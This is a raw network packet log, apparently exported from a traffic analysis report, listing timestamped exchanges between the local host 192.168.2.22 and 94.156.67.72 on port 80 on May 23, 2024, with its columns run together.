                                                    May 23, 2024 20:21:05.686768055 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.702835083 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.702872038 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.702905893 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.702907085 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.702922106 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.702943087 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.702951908 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.702990055 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.703020096 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.703054905 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.703071117 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.703088999 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.703099966 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.703123093 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.703136921 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.703174114 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.709140062 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.709175110 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.709203959 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.709213972 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.709270954 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.709305048 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.709319115 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.709351063 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.711466074 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.711524010 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.712966919 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.713001966 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.713023901 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.713035107 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.713043928 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.713073969 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.717498064 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.717534065 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.717565060 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.717578888 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.719609022 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.719645977 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.719667912 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.719683886 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.723763943 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.723798990 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.723824024 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.723841906 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.727998018 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.728035927 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.728055000 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.728075027 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.738730907 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.738768101 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.738796949 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.738831043 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.738905907 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.738936901 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.738955021 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.739321947 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.739356041 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.739378929 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.739399910 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.742697954 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.742732048 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.742750883 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.742765903 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.745142937 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.745177031 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.745203972 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.745218039 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.748248100 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.748282909 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.748302937 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.748317957 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.748321056 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.748362064 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.751327038 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.751363039 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.751389980 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.751400948 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.775590897 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.775651932 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.775690079 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.775700092 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.775724888 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.775727987 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.775736094 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.775763988 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.775764942 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.775801897 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.775803089 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.775840998 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.775845051 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.775882959 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.777338028 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.777375937 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.777401924 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.777426004 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.779654026 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.779694080 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.779722929 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.779735088 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.781614065 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.781652927 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.781691074 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.781691074 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.795272112 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.795335054 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.806004047 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.806070089 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.810602903 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.810642004 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.810663939 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.810677052 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.810682058 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.810722113 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.812061071 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.812098026 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.812118053 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.812141895 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.815092087 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.815128088 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.815155029 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.815172911 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.818142891 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.818180084 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.818201065 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.818217039 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.822567940 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.822586060 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.822632074 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.822645903 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.824269056 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.824306011 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.824328899 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.824340105 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.824340105 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.824383974 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.827317953 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.827353001 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.827385902 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.827394962 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.829761028 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.829797029 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.829821110 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.829830885 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.829837084 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.829874039 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.834527969 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.834563017 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.834587097 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.834602118 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.834759951 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.834796906 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.834811926 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.834836960 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.838535070 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.838570118 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.838589907 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.838608027 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.839550972 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.839586973 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.839603901 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.839620113 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.839626074 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.839663029 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.841885090 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.841921091 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.841942072 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.841954947 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.841963053 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.841995955 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.844229937 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.844263077 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.844293118 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.844319105 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.846599102 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.846635103 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.846657991 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.846673965 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.850656986 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.850692034 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.850718975 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.850733995 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.851255894 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.851290941 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.851304054 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.851331949 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.853718042 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.853754044 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.853779078 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.853787899 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.853786945 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.853832960 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.856157064 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.856193066 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.856216908 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.856225014 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.858609915 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.858671904 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.859911919 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.859947920 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.859975100 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.859989882 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.862236977 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.862274885 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.862293959 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.862313986 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.864614964 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.864650965 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.864671946 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.864686966 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.864692926 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.864727974 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.870755911 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.870819092 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.870850086 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.870906115 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.872865915 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.872927904 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.874022007 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.874073982 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.883542061 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.883578062 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.883610964 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.883898973 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.885912895 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.885950089 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.885971069 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.885988951 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.888309956 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.888344049 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.888375998 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.888376951 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.888408899 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.888408899 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.890664101 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.890701056 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.890723944 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.890734911 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.890743017 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.890777111 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.892666101 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.892702103 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.892726898 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.892749071 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.894438982 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.894474983 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.894499063 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.894527912 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.896328926 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.896364927 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.896378040 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.896397114 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.896406889 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.896435976 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.898211002 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.898246050 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.898268938 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.898278952 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.900118113 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.900152922 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.900171041 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.900187969 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.900197983 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.900221109 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.901988983 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.902025938 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.902041912 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.902064085 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.903924942 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.903959990 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.903980017 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.903989077 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.904000998 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.904027939 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.905632973 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.905668974 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.905687094 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.905710936 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.907795906 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.907831907 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.907859087 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.907866001 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.907866955 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.907907963 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.908921003 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.908957005 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.908977032 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.908999920 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.910501003 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.910537004 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.910557032 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.910578012 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.912024975 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.912060976 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.912081957 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.912097931 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.914556980 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.914594889 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.914614916 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.914630890 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.914634943 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.914671898 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.915117025 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.915153027 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.915168047 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.915194988 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.916667938 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.916703939 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.916724920 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.916739941 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.918121099 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.918157101 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.918188095 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.918200016 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.919627905 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.919666052 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.919686079 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.919699907 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.919706106 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.919740915 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.921132088 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.921166897 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.921185970 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.921207905 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.922544956 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.922580004 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.922600031 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.922612906 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.922621012 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.922653913 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.923939943 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.923974991 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.923995018 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.924015999 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.927828074 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.927864075 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.927894115 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.927901983 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.929059982 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.929095984 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.929107904 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.929130077 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.929140091 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.929169893 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.930293083 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.930327892 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.930342913 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.930361032 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.931509018 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.931544065 CEST804916994.156.67.72192.168.2.22
                                                    May 23, 2024 20:21:05.931565046 CEST4916980192.168.2.2294.156.67.72
                                                    May 23, 2024 20:21:05.931575060 CEST4916980192.168.2.2294.156.67.72
